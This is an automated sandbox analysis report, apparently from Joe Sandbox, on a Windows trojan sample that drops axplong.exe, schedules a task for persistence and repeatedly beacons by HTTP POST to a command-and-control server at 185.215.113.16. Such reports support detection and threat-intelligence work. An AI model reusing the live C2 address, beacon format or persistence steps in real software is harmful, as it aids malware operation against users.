                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownDNS traffic detected: query: 206.23.85.13.in-addr.arpa replaycode: Name error (3)
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006ABD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,7_2_006ABD60
                    Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001269000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3248149591.000000000126D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3248149591.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000126D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php32
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpZ
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpc
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpp;
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpt
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpx
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy

                    System Summary

                    barindex
                    PE file contains section with special chars
                    Source: EXyAlLKIck.exeStatic PE information: section name:
                    Source: EXyAlLKIck.exeStatic PE information: section name: .idata
                    Source: EXyAlLKIck.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E30687_2_006E3068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006AE4407_2_006AE440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006A4CF07_2_006A4CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006D7D837_2_006D7D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E765B7_2_006E765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006A4AF07_2_006A4AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E777B7_2_006E777B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E87207_2_006E8720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E6F097_2_006E6F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E2BD07_2_006E2BD0
                    Source: EXyAlLKIck.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: EXyAlLKIck.exeStatic PE information: Section: ZLIB complexity 0.9973763198228883
                    Source: EXyAlLKIck.exeStatic PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9973763198228883
                    Source: axplong.exe.0.drStatic PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: EXyAlLKIck.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile read: C:\Users\user\Desktop\EXyAlLKIck.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\EXyAlLKIck.exe "C:\Users\user\Desktop\EXyAlLKIck.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: EXyAlLKIck.exeStatic file information: File size 1878528 > 1048576
                    Source: EXyAlLKIck.exeStatic PE information: Raw size of wfabfqoe is bigger than: 0x100000 < 0x199000

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeUnpacked PE file: 0.2.EXyAlLKIck.exe.750000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 3.2.axplong.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 7.2.axplong.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: EXyAlLKIck.exeStatic PE information: real checksum: 0x1caa78 should be: 0x1d70b3
                    Source: axplong.exe.0.drStatic PE information: real checksum: 0x1caa78 should be: 0x1d70b3
                    Source: EXyAlLKIck.exeStatic PE information: section name:
                    Source: EXyAlLKIck.exeStatic PE information: section name: .idata
                    Source: EXyAlLKIck.exeStatic PE information: section name:
                    Source: EXyAlLKIck.exeStatic PE information: section name: wfabfqoe
                    Source: EXyAlLKIck.exeStatic PE information: section name: qxvdwait
                    Source: EXyAlLKIck.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.0.drStatic PE information: section name:
